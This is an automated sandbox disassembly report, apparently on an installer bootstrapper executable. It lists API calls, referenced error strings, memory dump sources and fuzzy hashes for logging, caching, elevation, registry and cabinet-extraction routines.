                                                                                                                                                                                                                                                                                                  • String ID: Engine is active, cannot change engine state.$Failed to set source path for container.$Failed to set source path for payload.$UX denied while trying to set source on embedded payload: %ls$UX requested unknown container with id: %ls$UX requested unknown payload with id: %ls
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(00000000), ref: 00867210
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to append escape sequence., xrefs: 008672A3
                                                                                                                                                                                                                                                                                                  • [\%c], xrefs: 0086726F
                                                                                                                                                                                                                                                                                                  • Failed to append characters., xrefs: 0086729C
                                                                                                                                                                                                                                                                                                  • Failed to allocate buffer for escaped string., xrefs: 00867227
                                                                                                                                                                                                                                                                                                  • Failed to copy string., xrefs: 008672C4
                                                                                                                                                                                                                                                                                                  • Failed to format escape sequence., xrefs: 008672AA
                                                                                                                                                                                                                                                                                                  • []{}, xrefs: 0086723A
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrlen
                                                                                                                                                                                                                                                                                                  • String ID: Failed to allocate buffer for escaped string.$Failed to append characters.$Failed to append escape sequence.$Failed to copy string.$Failed to format escape sequence.$[\%c]$[]{}
                                                                                                                                                                                                                                                                                                  • API String ID: 1659193697-3250950999
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000000,008AB500,000000FF,feclient.dll,000000FF,00000000,00000000,?,?,?,008867DE,?,00000001,?,008AB4A0), ref: 00885C45
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • feclient.dll, xrefs: 00885C3B, 00885D65
                                                                                                                                                                                                                                                                                                  • Failed to insert execute action., xrefs: 00885C9A
                                                                                                                                                                                                                                                                                                  • Failed to plan action for target product., xrefs: 00885CF0
                                                                                                                                                                                                                                                                                                  • Failed to copy target product code., xrefs: 00885D78
                                                                                                                                                                                                                                                                                                  • Failed grow array of ordered patches., xrefs: 00885CDE
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CompareString
                                                                                                                                                                                                                                                                                                  • String ID: Failed grow array of ordered patches.$Failed to copy target product code.$Failed to insert execute action.$Failed to plan action for target product.$feclient.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 1825529933-3477540455
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0089D262,00000000,00000000,00000000,00000000,00000000,00892F1D), ref: 0089CB2F
                                                                                                                                                                                                                                                                                                  • __fassign.LIBCMT ref: 0089CBAA
                                                                                                                                                                                                                                                                                                  • __fassign.LIBCMT ref: 0089CBC5
                                                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0089CBEB
                                                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,00000000,00000000,0089D262,00000000,?,?,?,?,?,?,?,?,?,0089D262,00000000), ref: 0089CC0A
                                                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,00000000,00000001,0089D262,00000000,?,?,?,?,?,?,?,?,?,0089D262,00000000), ref: 0089CC43
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1324828854-0
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF,00000000,00000100,00000000,?,?,?,00877113,000000B8,0000001C,00000100), ref: 008892A4
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000001,?,000000FF,008AB4B8,000000FF,?,?,?,00877113,000000B8,0000001C,00000100,00000100,00000100,000000B0), ref: 0088932E
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • BA aborted detect forward compatible bundle., xrefs: 00889398
                                                                                                                                                                                                                                                                                                  • detect.cpp, xrefs: 0088938E
                                                                                                                                                                                                                                                                                                  • comres.dll, xrefs: 008893B0
                                                                                                                                                                                                                                                                                                  • Failed to initialize update bundle., xrefs: 008893D1
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CompareString
                                                                                                                                                                                                                                                                                                  • String ID: BA aborted detect forward compatible bundle.$Failed to initialize update bundle.$comres.dll$detect.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1825529933-439563586
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00865479,000000FF,00AAC56B,E9008ABA,008653BD,00000000,?,E9008ABA,00000000), ref: 0087AC94
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,00000000,00000000,00865479,000000FF,00AAC56B,E9008ABA,008653BD,00000000,?,E9008ABA,00000000), ref: 0087ACD8
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • cache.cpp, xrefs: 0087AC6A, 0087ACB8, 0087ACFC
                                                                                                                                                                                                                                                                                                  • Failed authenticode verification of payload: %ls, xrefs: 0087AC75
                                                                                                                                                                                                                                                                                                  • Failed to verify expected payload against actual certificate chain., xrefs: 0087AD1E
                                                                                                                                                                                                                                                                                                  • Failed to get signer chain from authenticode certificate., xrefs: 0087AD06
                                                                                                                                                                                                                                                                                                  • Failed to get provider state from authenticode certificate., xrefs: 0087ACC2
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                                                                                                                                                  • String ID: Failed authenticode verification of payload: %ls$Failed to get provider state from authenticode certificate.$Failed to get signer chain from authenticode certificate.$Failed to verify expected payload against actual certificate chain.$cache.cpp
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,00000000,00000000), ref: 008A033C
                                                                                                                                                                                                                                                                                                  • GetComputerNameW.KERNEL32(?,?), ref: 008A0394
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • === Logging started: %ls ===, xrefs: 008A03BF
                                                                                                                                                                                                                                                                                                  • Executable: %ls v%d.%d.%d.%d, xrefs: 008A03F0
                                                                                                                                                                                                                                                                                                  • --- logging level: %hs ---, xrefs: 008A0454
                                                                                                                                                                                                                                                                                                  • Computer : %ls, xrefs: 008A0402
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Name$ComputerFileModule
                                                                                                                                                                                                                                                                                                  • String ID: --- logging level: %hs ---$=== Logging started: %ls ===$Computer : %ls$Executable: %ls v%d.%d.%d.%d
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000001,008AB500,?,00000001,000000FF,?,?,75A4B390,00000000,00000001,00000000,?,008774E6), ref: 0087D560
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to connect to elevated child process., xrefs: 0087D549
                                                                                                                                                                                                                                                                                                  • UX aborted elevation requirement., xrefs: 0087D475
                                                                                                                                                                                                                                                                                                  • Failed to create pipe name and client token., xrefs: 0087D4A1
                                                                                                                                                                                                                                                                                                  • Failed to elevate., xrefs: 0087D542
                                                                                                                                                                                                                                                                                                  • Failed to create pipe and cache pipe., xrefs: 0087D4BD
                                                                                                                                                                                                                                                                                                  • elevation.cpp, xrefs: 0087D46B
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                  • String ID: Failed to connect to elevated child process.$Failed to create pipe and cache pipe.$Failed to create pipe name and client token.$Failed to elevate.$UX aborted elevation requirement.$elevation.cpp
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,0087AD40,?,00000000,00000000), ref: 0087D2E9
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0087D2F5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0087CF25: WaitForSingleObject.KERNEL32(00000001,000493E0,00000000,?,?,0087D365,00000000,?,?,0087C7C9,00000001,?,?,?,?,?), ref: 0087CF37
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0087CF25: GetLastError.KERNEL32(?,?,0087D365,00000000,?,?,0087C7C9,00000001,?,?,?,?,?,00000000,00000000,?), ref: 0087CF41
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,?,?,0087C7C9,00000001,?,?,?,?,?,00000000,00000000,?,?,?), ref: 0087D376
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to pump messages in child process., xrefs: 0087D34D
                                                                                                                                                                                                                                                                                                  • elevation.cpp, xrefs: 0087D319
                                                                                                                                                                                                                                                                                                  • Failed to create elevated cache thread., xrefs: 0087D323
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$CloseCreateHandleObjectSingleThreadWait
                                                                                                                                                                                                                                                                                                  • String ID: Failed to create elevated cache thread.$Failed to pump messages in child process.$elevation.cpp
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,00000000,00000000,BundleUpgradeCode), ref: 008A15DA
                                                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,00000002,00000001,?,00000002,00000001,00000000,00000000,BundleUpgradeCode), ref: 008A163C
                                                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 008A1648
                                                                                                                                                                                                                                                                                                  • RegSetValueExW.ADVAPI32(?,?,00000000,00000007,?,?,00000001,?,?,00000002,00000001,00000000,00000000,BundleUpgradeCode), ref: 008A168B
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrlen$Value
                                                                                                                                                                                                                                                                                                  • String ID: BundleUpgradeCode$regutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 198323757-1648651458
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(008CB5FC,00000000,?,?,?,00874207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,008654FA,?), ref: 008A0533
                                                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(40000000,00000001,00000000,00000000,00000080,00000000,?,00000000,?,?,?,008CB5F4,?,00874207,00000000,Setup), ref: 008A05D7
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00874207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,008654FA,?,?,?), ref: 008A05E7
                                                                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00874207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,008654FA,?), ref: 008A0621
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00862DBF: GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 00862F09
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(008CB5FC,?,?,008CB5F4,?,00874207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,008654FA,?), ref: 008A067A
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalFileSection$CreateEnterErrorLastLeaveLocalPointerTime
                                                                                                                                                                                                                                                                                                  • String ID: logutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 4111229724-3545173039
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 008839F4
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to escape string., xrefs: 00883A76
                                                                                                                                                                                                                                                                                                  • %s%="%s", xrefs: 00883A27
                                                                                                                                                                                                                                                                                                  • Failed to format property string part., xrefs: 00883A6F
                                                                                                                                                                                                                                                                                                  • Failed to format property value., xrefs: 00883A7D
                                                                                                                                                                                                                                                                                                  • Failed to append property string part., xrefs: 00883A68
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Open@16
                                                                                                                                                                                                                                                                                                  • String ID: %s%="%s"$Failed to append property string part.$Failed to escape string.$Failed to format property string part.$Failed to format property value.
                                                                                                                                                                                                                                                                                                  • API String ID: 3613110473-515423128
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • MoveFileExW.KERNEL32(00000003,00000001,00000000,00000000,00000101,?,008A432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,0087A063,00000001), ref: 008A4203
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000002,?,008A432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,0087A063,00000001,000007D0,00000001,00000001,00000003), ref: 008A4212
                                                                                                                                                                                                                                                                                                  • MoveFileExW.KERNEL32(00000003,00000001,00000000,00000001,00000000,?,008A432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,0087A063,00000001), ref: 008A42A6
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,008A432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,0087A063,00000001,000007D0,00000001), ref: 008A42B0
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A4440: FindFirstFileW.KERNEL32(0088923A,?,00000100,00000000,00000000), ref: 008A447B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A4440: FindClose.KERNEL32(00000000), ref: 008A4487
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: File$ErrorFindLastMove$CloseFirst
                                                                                                                                                                                                                                                                                                  • String ID: \$fileutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3479031965-1689471480
                                                                                                                                                                                                                                                                                                  • Opcode ID: 420231a91b8bcf19a12d12df56439907610831482fac85ca5ccb3b4636e8c4fd
                                                                                                                                                                                                                                                                                                  • Instruction ID: f0a379f57284a7254f330765d30646186e16a6d62c70708004bf4ed1eee7e3aa
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 420231a91b8bcf19a12d12df56439907610831482fac85ca5ccb3b4636e8c4fd
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1B31D136A0122A9BFF315E99CC01B6E7A69FFD3761B115029FC04DBA14D3F08C5186D0
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00000000,00000000,00000000,?,?,?,00865932,00000100,00000100,00000000,00000000,00000001,00000000,00000100), ref: 0086733E
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(00000000,00000000,00000100,00000000,?,?,?,00865932,00000100,00000100,00000000,00000000,00000001,00000000,00000100), ref: 0086741D
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to get unformatted string., xrefs: 008673AE
                                                                                                                                                                                                                                                                                                  • *****, xrefs: 008673D9, 008673E6
                                                                                                                                                                                                                                                                                                  • Failed to format value '%ls' of variable: %ls, xrefs: 008673E7
                                                                                                                                                                                                                                                                                                  • Failed to get value as string for variable: %ls, xrefs: 0086740C
                                                                                                                                                                                                                                                                                                  • Failed to get variable: %ls, xrefs: 0086737F
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                                  • String ID: *****$Failed to format value '%ls' of variable: %ls$Failed to get unformatted string.$Failed to get value as string for variable: %ls$Failed to get variable: %ls
                                                                                                                                                                                                                                                                                                  • API String ID: 3168844106-2873099529
                                                                                                                                                                                                                                                                                                  • Opcode ID: ba748c88b2aa63fb6710c2a35068f361e7132ffc4009808afa639a77989dacf7
                                                                                                                                                                                                                                                                                                  • Instruction ID: d2323971b6784bf74a26660a79769072c023de775a00e4889a14e2a39d892e63
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ba748c88b2aa63fb6710c2a35068f361e7132ffc4009808afa639a77989dacf7
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6531E03290461AFBEF226F44CC09BAEBB64FF11329F024225FD00E6750D775AA649BD5
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • InitializeAcl.ADVAPI32(?,00000008,00000002,0000001A,00000000,?,00000000,00000000,?,?,00000000), ref: 00878E37
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00878E41
                                                                                                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,00000001,20000004,00000000,00000000,?,00000000,00000003,000007D0,?,00000000,00000000,?,?), ref: 00878EA1
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to allocate administrator SID., xrefs: 00878E1D
                                                                                                                                                                                                                                                                                                  • cache.cpp, xrefs: 00878E65
                                                                                                                                                                                                                                                                                                  • Failed to initialize ACL., xrefs: 00878E6F
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AttributesErrorFileInitializeLast
                                                                                                                                                                                                                                                                                                  • String ID: Failed to allocate administrator SID.$Failed to initialize ACL.$cache.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 669721577-1117388985
                                                                                                                                                                                                                                                                                                  • Opcode ID: 82685de01f9bf3ef27ff249378bb5160cc53c556149046b9b7615c0bf70a4523
                                                                                                                                                                                                                                                                                                  • Instruction ID: 78ae7e619c83ad2028ce5a5daa94b8258e4c7fc71a31a5bfefa6c29d82fb46c5
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 82685de01f9bf3ef27ff249378bb5160cc53c556149046b9b7615c0bf70a4523
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B21D833A80614F7EB219AD99C8AF9FB769FB45B20F118025F918FB280DB74DD009691
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?,00000000,crypt32.dll,?,?,00874028,00000001,feclient.dll,?,00000000,?,?,?,00864B12), ref: 0086424D
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00874028,00000001,feclient.dll,?,00000000,?,?,?,00864B12,?,?,008AB488,?,00000001), ref: 00864259
                                                                                                                                                                                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,?,?,00000000,?,?,00874028,00000001,feclient.dll,?,00000000,?,?,?,00864B12,?), ref: 00864294
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00874028,00000001,feclient.dll,?,00000000,?,?,?,00864B12,?,?,008AB488,?,00000001), ref: 0086429E
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CurrentDirectoryErrorLast
                                                                                                                                                                                                                                                                                                  • String ID: crypt32.dll$dirutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 152501406-1104880720
                                                                                                                                                                                                                                                                                                  • Opcode ID: 215679d0e6f9124f3e5310458000b77ebff6c853bb5a963f418e8694150a8cf1
                                                                                                                                                                                                                                                                                                  • Instruction ID: b270db74e93395eb45485ebef06536c66c45c15ea715671728fa040a94b0424b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 215679d0e6f9124f3e5310458000b77ebff6c853bb5a963f418e8694150a8cf1
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8011B777E01637AB97215AD98864B5FBA58FF05B617231175FE00E7341E720DC0086E0
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • cabextract.cpp, xrefs: 00880C2B
                                                                                                                                                                                                                                                                                                  • Failed to write during cabinet extraction., xrefs: 00880C35
                                                                                                                                                                                                                                                                                                  • Unexpected call to CabWrite()., xrefs: 00880BC1
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorFileLastWrite_memcpy_s
                                                                                                                                                                                                                                                                                                  • String ID: Failed to write during cabinet extraction.$Unexpected call to CabWrite().$cabextract.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1970631241-3111339858
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 00869AFB
                                                                                                                                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,00000000,00000000,?,0086A8B4,00000100,000002C0,000002C0,00000100), ref: 00869B10
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0086A8B4,00000100,000002C0,000002C0,00000100), ref: 00869B1B
                                                                                                                                                                                                                                                                                                  Strings
